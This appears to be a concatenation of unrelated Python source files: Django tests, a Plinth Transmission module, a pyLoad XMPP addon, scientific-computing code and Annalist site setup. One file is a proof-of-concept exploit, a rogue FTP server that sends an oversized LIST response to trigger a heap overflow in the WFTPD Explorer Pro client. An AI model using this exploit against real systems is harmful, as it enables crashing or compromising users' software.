kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1/save_question',{
'question_id': 4,
'question_type': settings.RESPONSE_QUESTION_TYPE,
'question_num': 4,
'title': 'Mecha',
'description': 'What was the name of Ledos mech?',
'answer': 'Chambers',
'marks': 1,
}, **kwargs)
self.assertEqual(response.status_code, 200)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(array['message'], 'question was saved')
self.assertEqual(array['status'], 'success')
def test_delete_question_with_essay_question(self):
EssayQuestion.objects.create(
question_id=1,
assignment=Assignment.objects.get(assignment_id=1),
title="Evolvers",
description="Write an essay about the Evolvers.",
)
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1/delete_question',{
'question_id': 1,
'question_type': settings.ESSAY_QUESTION_TYPE,
}, **kwargs)
self.assertEqual(response.status_code, 200)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(array['message'], 'question was deleted')
self.assertEqual(array['status'], 'success')
def test_delete_question_with_multiple_choice_question(self):
MultipleChoiceQuestion.objects.create(
question_id=2,
assignment=Assignment.objects.get(assignment_id=1),
title="Hideauze",
description="Who where the Hideauze?",
a="Former Humans",
a_is_correct=True,
b="Aliens",
b_is_correct=False,
c="Magical or Supernatural Creatures",
c_is_correct=False,
)
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1/delete_question',{
'question_id': 2,
'question_type': settings.MULTIPLECHOICE_QUESTION_TYPE,
}, **kwargs)
self.assertEqual(response.status_code, 200)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(array['message'], 'question was deleted')
self.assertEqual(array['status'], 'success')
def test_delete_question_with_true_false_question(self):
TrueFalseQuestion.objects.create(
question_id=3,
assignment=Assignment.objects.get(assignment_id=1),
title="Hideauze",
description="Where the Hideauze human?",
true_choice="Yes, former humans",
false_choice="No, aliens",
answer=True,
)
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1/delete_question',{
'question_id': 3,
'question_type': settings.TRUEFALSE_QUESTION_TYPE,
}, **kwargs)
self.assertEqual(response.status_code, 200)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(array['message'], 'question was deleted')
self.assertEqual(array['status'], 'success')
def test_delete_question_with_response_question(self):
ResponseQuestion.objects.create(
question_id=4,
assignment=Assignment.objects.get(assignment_id=1),
title="Ice Age",
description="Why did humanity migrate off-world?",
answer="Because of solar hibernation causing Global Cooling on Earth.",
)
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1/delete_question',{
'question_id': 4,
'question_type': settings.RESPONSE_QUESTION_TYPE,
}, **kwargs)
self.assertEqual(response.status_code, 200)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(array['message'], 'question was deleted')
self.assertEqual(array['status'], 'success')
def test_url_resolves_to_questions_table_view(self):
found = resolve('/teacher/course/1/assignment/1/questions_table')
self.assertEqual(found.func, assignment.questions_table)
def test_questions_table_returns_without_questions(self):
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1/questions_table')
self.assertEqual(response.status_code, 200)
self.assertIn(b'ajax_question(0,0);',response.content)
def test_questions_table_returns_with_questions(self):
ResponseQuestion.objects.create(
question_id=4,
assignment=Assignment.objects.get(assignment_id=1),
title="Ice Age",
description="Why did humanity migrate off-world?",
answer="Because of solar hibernation causing Global Cooling on Earth.",
)
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1/questions_table')
self.assertEqual(response.status_code, 200)
self.assertIn(b'Response',response.content)
def test_question_type_modal(self):
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1/question_type_modal',**kwargs)
self.assertEqual(response.status_code, 200)
self.assertIn(b'question_modal',response.content)
def test_question_essay_modal(self):
EssayQuestion.objects.create(
question_id=1,
assignment=Assignment.objects.get(assignment_id=1),
title="Evolvers",
description="Write an essay about the Evolvers.",
)
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1/question_essay_modal',{
'question_id': 1,
},**kwargs)
self.assertEqual(response.status_code, 200)
self.assertIn(b'question_modal',response.content)
def test_question_multiple_choice_modal(self):
MultipleChoiceQuestion.objects.create(
question_id=2,
assignment=Assignment.objects.get(assignment_id=1),
title="Hideauze",
description="Who where the Hideauze?",
a="Former Humans",
a_is_correct=True,
b="Aliens",
b_is_correct=False,
c="Magical or Supernatural Creatures",
c_is_correct=False,
)
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1/question_multiple_choice_modal',{
'question_id':2,
},**kwargs)
self.assertEqual(response.status_code, 200)
self.assertIn(b'question_modal',response.content)
def test_question_true_false_modal(self):
TrueFalseQuestion.objects.create(
question_id=3,
assignment=Assignment.objects.get(assignment_id=1),
title="Hideauze",
description="Where the Hideauze human?",
true_choice="Yes, former humans",
false_choice="No, aliens",
answer=True,
)
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1/question_true_false_modal',{
'question_id':3,
},**kwargs)
self.assertEqual(response.status_code, 200)
self.assertIn(b'question_modal',response.content)
def test_question_response_modal(self):
ResponseQuestion.objects.create(
question_id=4,
assignment=Assignment.objects.get(assignment_id=1),
title="Ice Age",
description="Why did humanity migrate off-world?",
answer="Because of solar hibernation causing Global Cooling on Earth.",
)
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1/question_response_modal',{
'question_id':4,
},**kwargs)
self.assertEqual(response.status_code, 200)
self.assertIn(b'question_modal',response.content)
def test_delete_question_with_incorrect_user(self):
ResponseQuestion.objects.create(
question_id=4,
assignment=Assignment.objects.get(assignment_id=1),
title="Ice Age",
description="Why did humanity migrate off-world?",
answer="Because of solar hibernation causing Global Cooling on Earth.",
)
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_trudy_client()
response = client.post('/teacher/course/1/assignment/1/delete_question',{
'question_id': 4,
'question_type': settings.RESPONSE_QUESTION_TYPE,
}, **kwargs)
self.assertEqual(response.status_code, 200)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(array['message'], 'unauthorized deletion')
self.assertEqual(array['status'], 'failed')
|
AcademicsToday/py-academicstoday
|
academicstoday_project/teacher/tests/test_assignment.py
|
Python
|
apache-2.0
| 26,573
|
#
# This file is part of Plinth.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""
Plinth module to configure Transmission server
"""
from django.utils.translation import ugettext_lazy as _
import json
from plinth import actions
from plinth import action_utils
from plinth import frontpage
from plinth import service as service_module
from plinth.menu import main_menu
version = 1
managed_services = ['transmission-daemon']
managed_packages = ['transmission-daemon']
name = _('Transmission')
short_description = _('BitTorrent')
description = [
_('BitTorrent is a peer-to-peer file sharing protocol. '
'Transmission daemon handles Bitorrent file sharing. Note that '
'BitTorrent is not anonymous.'),
_('Access the web interface at <a href="/transmission">/transmission</a>.')
]
reserved_usernames = ['debian-transmission']
service = None
def init():
"""Intialize the Transmission module."""
menu = main_menu.get('apps')
menu.add_urlname(name, 'glyphicon-save', 'transmission:index', short_description)
global service
setup_helper = globals()['setup_helper']
if setup_helper.get_state() != 'needs-setup':
service = service_module.Service(
managed_services[0], name, ports=['http', 'https'],
is_external=True, is_enabled=is_enabled,
enable=enable, disable=disable)
if is_enabled():
add_shortcut()
def setup(helper, old_version=None):
"""Install and configure the module."""
helper.install(managed_packages)
new_configuration = {'rpc-whitelist-enabled': False}
helper.call('post', actions.superuser_run, 'transmission',
['merge-configuration'],
input=json.dumps(new_configuration).encode())
helper.call('post', actions.superuser_run, 'transmission', ['enable'])
global service
if service is None:
service = service_module.Service(
managed_services[0], name, ports=['http', 'https'],
is_external=True, is_enabled=is_enabled,
enable=enable, disable=disable)
helper.call('post', service.notify_enabled, None, True)
helper.call('post', add_shortcut)
def add_shortcut():
frontpage.add_shortcut(
'transmission', name, short_description=short_description, url='/transmission',
login_required=True)
def is_enabled():
"""Return whether the module is enabled."""
return (action_utils.service_is_enabled('transmission-daemon') and
action_utils.webserver_is_enabled('transmission-plinth'))
def enable():
"""Enable the module."""
actions.superuser_run('transmission', ['enable'])
add_shortcut()
def disable():
"""Enable the module."""
actions.superuser_run('transmission', ['disable'])
frontpage.remove_shortcut('transmission')
def diagnose():
"""Run diagnostics and return the results."""
results = []
results.append(action_utils.diagnose_port_listening(9091, 'tcp4'))
results.append(action_utils.diagnose_port_listening(9091, 'tcp6'))
results.extend(action_utils.diagnose_url_on_all(
'https://{host}/transmission', check_certificate=False))
return results
|
harry-7/Plinth
|
plinth/modules/transmission/__init__.py
|
Python
|
agpl-3.0
| 3,811
|
# -*- coding: utf-8 -*-
import asyncio
import os
import ssl
import slixmpp
from slixmpp.xmlstream.handler import Callback
from slixmpp.xmlstream.matcher import MatchXPath
from ..base.chat_bot import ChatBot
class XMPP(ChatBot):
__name__ = "XMPP"
__type__ = "addon"
__version__ = "0.23"
__status__ = "testing"
__config__ = [
("enabled", "bool", "Activated", False),
("jid", "str", "Jabber ID", "user@exmaple-jabber-server.org"),
("pw", "str", "Password", ""),
("use_ipv6", "bool", "Use ipv6", False),
("tls", "bool", "Use TLS", True),
("use_ssl", "bool", "Use old SSL", False),
(
"owners",
"str",
"List of JIDs accepting commands from",
"me@icq-gateway.org;some@msn-gateway.org",
),
("captcha", "bool", "Send captcha requests", True),
("info_file", "bool", "Inform about every file finished", False),
("info_pack", "bool", "Inform about every package finished", True),
("all_download", "bool", "Inform about all download finished", False),
("package_failed", "bool", "Notify package failed", False),
("download_failed", "bool", "Notify download failed", True),
("download_start", "bool", "Notify download start", True),
("maxline", "int", "Maximum line per message", 6),
]
__description__ = """Connect to jabber and let owner perform different tasks"""
__license__ = "GPLv3"
__authors__ = [
("RaNaN", "RaNaN@pyload.net"),
("GammaC0de", "nitzo2001[AT]yahoo[DOT]com"),
]
def activate(self):
self.log_debug("activate")
self.jid = slixmpp.jid.JID(self.config.get("jid"))
self.jid.resource = "PyLoadNotifyBot"
self.log_debug(self.jid)
super().activate()
def run(self):
self.log_debug("def run")
if os.name == "nt":
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
xmpp = XMPPClient(
self.jid,
self.config.get("pw"),
self.log_info,
self.log_debug,
)
self.log_debug("activate xmpp")
xmpp.use_ipv6 = self.config.get("use_ipv6")
xmpp.register_plugin("xep_0030") # Service Discovery
xmpp.register_plugin("xep_0004") # Data Forms
xmpp.register_plugin("xep_0060") # PubSub
xmpp.register_plugin("xep_0199") # XMPP Ping
xmpp.ssl_version = ssl.PROTOCOL_TLSv1_2
# The message event is triggered whenever a message
# stanza is received. Be aware that that includes
# MUC messages and error messages.
xmpp.add_event_handler("message", self.message)
xmpp.add_event_handler("connected", self.connected)
xmpp.add_event_handler("connection_failed", self.connection_failed)
xmpp.add_event_handler("disconnected", self.disconnected)
xmpp.add_event_handler("failed_auth", self.failed_auth)
xmpp.add_event_handler("changed_status", self.changed_status)
xmpp.add_event_handler("presence_error", self.presence_error)
xmpp.add_event_handler("presence_unavailable", self.presence_unavailable)
xmpp.register_handler(
Callback(
"Stream Error",
MatchXPath(f"{{{xmpp.stream_ns}}}error"),
self.stream_error,
)
)
self.xmpp = xmpp
self.xmpp.connect(
use_ssl=self.config.get("use_ssl"),
force_starttls=self.config.get("tls"),
)
self.xmpp.process(forever=True)
############################################################################
# xmpp handlers
def changed_status(self, stanza=None):
self.log_debug("changed_status", stanza, stanza.get_type())
def connection_failed(self, stanza=None):
self.log_error("Unable to connect", stanza)
def connected(self, event=None):
self.log_info("Client was connected", event)
def disconnected(self, event=None):
self.log_info("Client was disconnected", event)
def presence_error(self, stanza=None):
self.log_debug("presence_error", stanza)
def presence_unavailable(self, stanza=None):
self.log_debug("presence_unavailable", stanza)
def failed_auth(self, event=None):
self.log_info("Failed to authenticate")
def stream_error(self, err=None):
self.log_debug("Stream Error", err)
# self.periodical.stop()
def message(self, stanza):
"""
Message handler for the component.
"""
self.log_debug("message", stanza)
subject = stanza["subject"]
body = stanza["body"]
msg_type = stanza["type"]
sender_jid = stanza["from"]
names = self.config.get("owners").split(";")
self.log_debug(f"Message from {sender_jid} received.")
self.log_debug(f"Body: {body} Subject: {subject} Type: {msg_type}")
if msg_type == "headline":
#: 'headline' messages should never be replied to
return True
if subject:
subject = "Re: " + subject
if not (sender_jid.username in names or sender_jid.bare in names):
return True
temp = body.split()
try:
command = temp[0]
args = temp[1:]
except IndexError:
command = "error"
args = []
ret = False
try:
res = self.do_bot_command(command, args)
if res:
msg_reply = "\n".join(res)
else:
msg_reply = "ERROR: invalid command, enter: help"
self.log_debug("Send response")
ret = stanza.reply(msg_reply).send()
except Exception as exc:
self.log_error(exc)
stanza.reply("ERROR: " + str(exc)).send()
return ret
# end xmpp handler
############################################################################
def announce(self, message):
"""
Send message to all owners
"""
self.log_debug("Announce, message:", message)
for user in self.config.get("owners").split(";"):
self.log_debug("Send message to", user)
to_jid = slixmpp.jid.JID(user)
self.xmpp.sendMessage(
mfrom=self.jid, mto=to_jid, mtype="chat", mbody=str(message)
)
############################################################################
# pyLoad events
def exit(self):
self.xmpp.disconnect()
def before_reconnect(self, ip):
self.log_debug("before_reconnect")
self.xmpp.disconnect()
def after_reconnect(self, ip, oldip):
self.log_debug("after_reconnect")
self.xmpp.connect()
# self.periodical.start(600)
def download_failed(self, pyfile):
self.log_debug("download_failed", pyfile, pyfile.error)
try:
if self.config.get("download_failed"):
self.announce(
self._("Download failed: {} (#{}) in #{} @ {}: {}").format(
pyfile.name,
pyfile.id,
pyfile.packageid,
pyfile.pluginname,
pyfile.error,
)
)
except Exception as exc:
self.log_error(exc)
def package_failed(self, pypack):
self.log_debug("package_failed", pypack)
try:
if self.config.get("package_failed"):
self.announce(
self._("Package failed: {} ({}).").format(pypack.name, pypack.id)
)
except Exception as exc:
self.log_error(exc)
def package_finished(self, pypack):
self.log_debug("package_finished")
try:
if self.config.get("info_pack"):
self.announce(
self._("Package finished: {} ({}).").format(pypack.name, pypack.id)
)
except Exception as exc:
self.log_error(exc)
def download_finished(self, pyfile):
self.log_debug("download_finished")
try:
if self.config.get("info_file"):
self.announce(
self._("Download finished: {} (#{}) in #{} @ {}").format(
pyfile.name, pyfile.id, pyfile.packageid, pyfile.pluginname
)
)
except Exception as exc:
self.log_error(exc)
def all_downloads_processed(self, arg=None):
self.log_debug("all_downloads_processed", arg)
try:
if self.config.get("all_download"):
self.announce(self._("All download finished."))
except Exception:
pass
def download_start(self, pyfile, url, filename):
self.log_debug("download_start", pyfile, url, filename)
try:
if self.config.get("download_start"):
self.announce(
self._("Download start: {} (#{}) in (#{}) @ {}.").format(
pyfile.name, pyfile.id, pyfile.packageid, pyfile.pluginname
)
)
except Exception:
pass
# end pyLoad events
############################################################################
class XMPPClient(slixmpp.ClientXMPP):
def __init__(self, jid, password, log_info, log_debug):
self.log_debug = log_debug
self.log_info = log_info
slixmpp.ClientXMPP.__init__(self, jid, password)
self.add_event_handler("session_start", self.start)
def start(self, event):
self.log_debug("Session started")
self.send_presence()
self.get_roster(timeout=60)
|
vuolter/pyload
|
src/pyload/plugins/addons/XMPP.py
|
Python
|
agpl-3.0
| 9,928
|
##########################################
# WftpdExpPro_HeapPoC.py #
# Discovered by r4x (Kamil Szczerba) #
# [r4xks@o2.pl] #
##########################################
# Soft : WFTPD Explorer Pro 1.0 #
# Vendor : Texas Imperial Software #
# Vuln : Heap Overwlow (Res: LIST) #
# Exploit : PoC Reg Overwrite #
##########################################
# Reg: #
# EAX = 41414141 #
# ECX = 41414141 #
# EDX = 00a57b38 ASCII "AAAA..." #
# ESI = 00a57b30 ASCII "AAAA..." #
# ------------------------------ #
# EIP = 7c91142E #
# #
# Exception c0000005 (ACCES_VIOLATION) #
# #
# MOV DWORD PTR DS:[ECX],EAX ; HEHE #
# MOV DWORD PTR DS:[EAX +4] ECX ; #
# #
# Test on: WinXPsp2 Polish #
# #
##########################################
from socket import *
heapb0f = "A" * 1200 + "r\n"
req = (
"USER",
"PASS",
"TYPE",
"PWD",
"PASV",
"LIST"
)
res = (
"331 Password required.\r\n",
"230 User logged in.\r\n",
"200 Type set to I.\r\n",
"257 '/' is current directory.\r\n",
"227 Entering Passive Mode (127,0,0,1,100,100).\r\n",
"150 Opening ASCII mode data connection for file list.\r\n",
)
def parser(buff):
cmd = buff.split("\x20")[0]
cmd1 = buff.split("\r\n")[0]
if len(cmd) > len(cmd1):
cmd = cmd1
for i in range(len(req)):
if req[i] == cmd:
return res[i]
def multiserv(port1, port2):
control = socket(AF_INET, SOCK_STREAM)
control.bind(('', port1))
control.listen(1)
trans = socket(AF_INET, SOCK_STREAM)
trans.bind(('', port2))
trans.listen(1)
while(1):
cclient, caddr = control.accept()
print "[*] Connected: ", caddr
cclient.send("220 Welcome: Evil Secure FTPD 1.666\r\n")
while(1):
r0 = cclient.recv(1024)
print "[>] Input: %s" % (r0)
r1 = parser(r0)
if r1 == None:
r1 = "502 Command not implemented.\r\n"
cclient.send(r1)
print "[<] Output: %s" % (r1)
if r1 == res[4]:
print "[*] Data mode\n"
tclient, taddr = trans.accept()
print "[*] Connected: ", taddr
if r1 == res[5]:
print "[*] b00mb!"
tclient.send(heapb0f)
print "[*] done"
break
break
multiserv(21, 25700)
|
knightmare2600/d4rkc0de
|
exploits/071218.py
|
Python
|
gpl-2.0
| 2,884
|
# Copyright (C) 2015 Jan Blechta
#
# This file is part of dolfin-tape.
#
# dolfin-tape is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# dolfin-tape is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with dolfin-tape. If not, see <http://www.gnu.org/licenses/>.
from sympy import Symbol, symbols, sin, pi, Matrix, diff, integrate, \
sin, atan2, sqrt
from sympy import ccode as sympy_ccode
from dolfin import Expression, FiniteElement
__all__ = ["pLaplace_modes", "pLaplace_ChaillouSuri", "pStokes_vortices"]
ccode = lambda *args, **kwargs: sympy_ccode(*args, **kwargs).replace('M_PI', 'pi')
def pLaplace_modes(*args, **kwargs):
"""Returns 2-tuple of DOLFIN Expressions initialized with *args and
**kwargs passed in and solving zero BC p-Laplace problem on unit square
as solution and corresponding right-hand side.
Mandatory kwargs:
kwargs['p'] > 1.0 ... Lebesgue exponent
kwargs['eps'] >= 0.0 ... amount of regularization
kwargs['n'] uint ... x-mode
kwargs['m'] uint ... y-mode
"""
p = Symbol('p', positive=True, constant=True)
eps = Symbol('eps', nonnegative=True, constant=True)
n = Symbol('n', integer=True, positive=True, constant=True)
m = Symbol('m', integer=True, positive=True, constant=True)
x = symbols('x[0] x[1]', real=True)
dim = len(x)
u = sin(n*pi*x[0])*sin(m*pi*x[1])
Du = Matrix([diff(u, x[j]) for j in xrange(dim)])
q = (eps + Du.norm(2)**2)**(p/2-1) * Du
f = -sum(diff(q[j], x[j]) for j in xrange(dim))
u_code = ccode(u)
# Prevent division by zero
f_code = "x[0]*x[0] + x[1]*x[1] < 1e-308 ? 0.0 : \n" + ccode(f)
return [Expression(u_code, *args, **kwargs),
Expression(f_code, *args, **kwargs)]
def pLaplace_ChaillouSuri(p, *args, **kwargs):
u_code = "(pow(0.5, p1) - pow((x[0]-0.5)*(x[0]-0.5)+(x[1]-0.5)*(x[1]-0.5), 0.5*p1))/p1"
f_code = "2.0"
kwargs['p1'] = p/(p-1)
return [Expression(u_code, *args, **kwargs),
Expression(f_code, *args, **kwargs)]
def pLaplace_CarstensenKlose(*args, **kwargs):
p = Symbol('p', positive=True, constant=True)
eps = Symbol('eps', nonnegative=True, constant=True)
delta = Symbol('delta', positive=True, constant=True)
x = symbols('x[0] x[1]', real=True)
r = sqrt(x[0]**2 + x[1]**2)
theta = pi + atan2(-x[1], -x[0])
u = r**delta * sin(delta*theta)
dim = len(x)
Du = Matrix([diff(u, x[j]) for j in xrange(dim)])
q = (eps + Du.norm(2)**2)**(p/2-1) * Du
f = -sum(diff(q[j], x[j]) for j in xrange(dim))
u_code = ccode(u)
f_code = ccode(f)
# Use Quadrature element as f is infinite at r=0
kwargs_f = kwargs.copy()
kwargs_f['element'] = FiniteElement('Quadrature',
kwargs_f['domain'].ufl_cell(),
kwargs_f.pop('degree'),
quad_scheme='default')
return [Expression(u_code, *args, **kwargs),
Expression(f_code, *args, **kwargs_f)]
def pStokes_vortices(*args, **kwargs):
"""Returns 4-tuple of DOLFIN Expressions initialized with *args and
**kwargs passed in and solving no-slip p-Stokes problem on unit square
as velocity, pressure, extra stress and body force.
Mandatory kwargs:
kwargs['eps'] >= 0.0 ... amount of regularization
kwargs['n'] uint ... number of vortices in each direction
kwargs['mu'] > 0.0 ... 'viscosity'
Optional kwargs:
kwargs['r'] > 1.0 ... power-law exponent, default 2
"""
if kwargs.get('r', 2) == 2:
codes = _pStokes_vortices_ccode(r=2)
else:
codes = _pStokes_vortices_ccode()
return (Expression(c, *args, **kwargs) for c in codes)
def _pStokes_vortices_ccode(r=None):
n = Symbol('n', integer=True, positive=True, constant=True)
mu = Symbol('mu', positive=True, constant=True)
x = symbols('x[0] x[1]')
dim = len(x)
u = (sin(n*pi*x[0])**2*sin(2*n*pi*x[1]), -sin(n*pi*x[1])**2*sin(2*n*pi*x[0]))
p = x[0]**2
p = p - integrate(p, (x[0], 0, 1), (x[1], 0, 1))
L = Matrix(dim, dim, [diff(u[i], x[j]) for i in xrange(dim) for j in xrange(dim)])
D = (L+L.T)/2
D2 = (D*D.T).trace()
eps = Symbol('eps', nonnegative=True, constant=True)
if not r:
r = Symbol('r', positive=True, constant=True)
S = 2*mu*(eps + D2)**(r/2-1)*D
divS = tuple(sum(diff(S[i, j], x[j]) for j in xrange(dim)) for i in xrange(dim))
gradp = tuple(diff(p, x[i]) for i in xrange(dim))
f = tuple(gradp[i] - divS[i] for i in xrange(dim))
div_guard = "x[0]*x[0] + x[1]*x[1] < 1e-308 ? 0.0 : \n"
p_code = ccode(p)
u_code = tuple(ccode(u[i]) for i in xrange(dim))
f_code = tuple(div_guard + ccode(f[i]) for i in xrange(dim))
S_code = tuple(tuple(ccode(S[i, j]) for j in xrange(dim)) for i in xrange(dim))
return u_code, p_code, S_code, f_code
|
blechta/dolfin-tape
|
dolfintape/demo_problems/exact_solutions.py
|
Python
|
gpl-3.0
| 5,383
|
"""
Create Annalist/Django site data.
Note: uses data in `sampledata/empty/annalist_site`
"""
from __future__ import unicode_literals
from __future__ import absolute_import, division, print_function
__author__ = "Graham Klyne (GK@ACM.ORG)"
__copyright__ = "Copyright 2014, G. Klyne"
__license__ = "MIT (http://opensource.org/licenses/MIT)"
import os
import sys
import logging
import subprocess
import importlib
# import shutil
log = logging.getLogger(__name__)
from annalist.identifiers import ANNAL, RDFS
from annalist import layout
from annalist.util import removetree, replacetree, updatetree, ensure_dir
from annalist.models.site import Site
from . import am_errors
from .am_settings import am_get_settings, am_get_site_settings
def am_createsite(annroot, userhome, options):
"""
Create Annalist empty site data.
annroot is the root directory for the Annalist software installation.
userhome is the home directory for the host system user issuing the command.
options contains options parsed from the command line.
returns 0 if all is well, or a non-zero status code.
This value is intended to be used as an exit status code
for the calling program.
"""
status = am_errors.AM_SUCCESS
sitesettings = am_get_site_settings(annroot, userhome, options)
if not sitesettings:
print("Settings not found (%s)"%(options.configuration), file=sys.stderr)
return am_errors.AM_NOSETTINGS
if len(options.args) > 0:
print(
"Unexpected arguments for %s: (%s)"%
(options.command, " ".join(options.args)),
file=sys.stderr
)
return am_errors.AM_UNEXPECTEDARGS
site_layout = layout.Layout(sitesettings.BASE_DATA_DIR, sitesettings.SITE_DIR_NAME)
sitebasedir = site_layout.SITE_PATH
#@@@@@ sitebaseurl = "/annalist/" # @@TODO: figure more robust way to define this
sitebaseurl = sitesettings.STATIC_URL
# --- If old site exists and --force option given, remove it
if os.path.exists(os.path.join(sitebasedir, site_layout.SITEDATA_DIR)):
if options.force:
print("Removing old Annalist site at %s"%(sitebasedir))
log.info("rmtree: %s"%(sitebasedir))
removetree(sitebasedir)
else:
print(
"Old data already exists at %s (use '--force' or '-f' to overwrite)."%
(sitebasedir), file=sys.stderr
)
print(
"NOTE: using '--force' or '-f' "+
"removes old site user permissions and namespace data "+
"and requires re-initialization of Django database with local usernames; "+
"consider using 'annalist-manager updatesite'."
)
return am_errors.AM_EXISTS
# --- Initialize empty site data in target directory
print("Initializing Annalist site in %s"%(sitebasedir))
site = Site.create_site_metadata(
sitebaseurl, sitebasedir,
label="Annalist site (%s configuration)"%options.configuration,
description="Annalist %s site metadata and site-wide values."%options.configuration
)
sitedata = site.site_data_collection()
Site.create_site_readme(site)
site_data_src = os.path.join(annroot, "annalist/data/sitedata") # @@TODO: more robust definition
site_data_tgt, site_data_file = sitedata._dir_path()
print("Copy Annalist site data")
print("from %s"%site_data_src)
for sdir in layout.COLL_DIRS:
print("- %s -> %s"%(sdir, site_data_tgt))
Site.replace_site_data_dir(sitedata, sdir, site_data_src)
# @@TODO: filename logic copied from EntityRoot and Collection - create separate method for getting this
(sitedata_dir, sitedata_file) = sitedata._dir_path()
context_dir = os.path.join(sitedata_dir, layout.META_COLL_BASE_REF)
context_file = os.path.join(context_dir, layout.COLL_CONTEXT_FILE)
#@@
print("Generating %s"%(context_file))
sitedata.generate_coll_jsonld_context()
# --- Copy provider data to site config provider directory
provider_dir_src = os.path.join(annroot, "annalist/data/identity_providers")
provider_dir_tgt = os.path.join(sitesettings.CONFIG_BASE, "providers")
print("Copy identity provider data:")
print("- from: %s"%(provider_dir_src,))
print("- to: %s"%(provider_dir_tgt,))
ensure_dir(provider_dir_tgt)
updatetree(provider_dir_src, provider_dir_tgt)
# --- Copy sample system configuration files to config directory
config_dir_src = os.path.join(annroot, "annalist/data/config_examples")
config_dir_tgt = os.path.join(sitesettings.CONFIG_BASE, "config")
print("Copy system configuration sample files:")
print("- from: %s"%(config_dir_src,))
print("- to: %s"%(config_dir_tgt,))
ensure_dir(config_dir_tgt)
updatetree(config_dir_src, config_dir_tgt)
# --- Created
print("Now run 'annalist-manager initialize' to create site admin database")
return status
def am_updatesite(annroot, userhome, options):
"""
Update site data, leaving user data alone
annroot is the root directory for the Annalist software installation.
userhome is the home directory for the host system user issuing the command.
options contains options parsed from the command line.
returns 0 if all is well, or a non-zero status code.
This value is intended to be used as an exit status code
for the calling program.
"""
status = am_errors.AM_SUCCESS
sitesettings = am_get_site_settings(annroot, userhome, options)
if not sitesettings:
print("Settings not found (%s)"%(options.configuration), file=sys.stderr)
return am_errors.AM_NOSETTINGS
if len(options.args) > 0:
print(
"Unexpected arguments for %s: (%s)"%
(options.command, " ".join(options.args)),
file=sys.stderr
)
return am_errors.AM_UNEXPECTEDARGS
site_layout = layout.Layout(sitesettings.BASE_DATA_DIR, sitesettings.SITE_DIR_NAME)
sitebasedir = site_layout.SITE_PATH
sitebaseurl = "/annalist/" # @@TODO: figure more robust way to define this
site = Site(sitebaseurl, site_layout.SITE_PATH)
sitedata = site.site_data_collection(test_exists=False)
if sitedata is None:
print("Initializing Annalist site metadata in %s (migrating to new layout)"%(sitebasedir))
site = Site.create_site_metadata(
sitebaseurl, sitebasedir,
label="Annalist site (%s configuration)"%options.configuration,
description="Annalist %s site metadata and site-wide values."%options.configuration
)
sitedata = site.site_data_collection()
site_data_src = os.path.join(annroot, "annalist/data/sitedata") # @@TODO: more robust definition
site_data_tgt, site_data_file = sitedata._dir_path()
# --- Migrate old site data to new site directory
# _annalist_site/
site_data_old1 = os.path.join(sitebasedir, site_layout.SITEDATA_OLD_DIR1)
old_site_metadata = os.path.join(site_data_old1, site_layout.SITE_META_FILE)
old_site_database = os.path.join(site_data_old1, site_layout.SITE_DATABASE_FILE)
old_users1 = os.path.join(site_data_old1, layout.USER_DIR_PREV)
old_vocabs1 = os.path.join(site_data_old1, layout.VOCAB_DIR_PREV)
if os.path.isfile(old_site_metadata):
print("Move old site metadata: %s -> %s"%(old_site_metadata, sitebasedir))
new_site_metadata = os.path.join(sitebasedir, site_layout.SITE_META_FILE)
os.rename(old_site_metadata, new_site_metadata)
if os.path.isfile(old_site_database):
print("Move old site database: %s -> %s"%(old_site_database, sitebasedir))
new_site_database = os.path.join(sitebasedir, site_layout.SITE_DATABASE_FILE)
os.rename(old_site_database, new_site_database)
